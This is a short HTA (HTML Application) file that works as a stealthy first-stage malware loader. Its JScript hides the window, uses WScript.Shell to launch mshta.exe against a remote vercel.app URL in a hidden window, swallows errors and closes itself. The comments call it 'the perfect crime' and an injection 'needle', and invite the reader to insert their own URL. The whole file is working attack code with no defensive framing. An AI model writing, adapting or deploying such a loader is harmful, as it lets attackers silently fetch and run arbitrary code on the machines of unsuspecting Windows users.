<hta:application
    id="Loader"
    applicationName="init"
    windowState="minimize"
    showInTaskBar="no"
    singleInstance="yes"
    caption="no"
    scroll="no"
/>
<html>
<head>
<title>...</title>
<script language="JScript">
    try {
        var url = "https://sdfhb-topaz.vercel.app/"; // <<< YOUR URL HERE
        var shell = new ActiveXObject("WScript.Shell");
        var command = "mshta.exe " + url;
        shell.Run(command, 0, false); // 0 = Hidden Window, false = Do not wait
    } catch (e) {
        // Fails silently, the perfect crime.
    }
    self.close(); // The needle dissolves after injection.
</script>
</head>
<body>
</body>
</html>
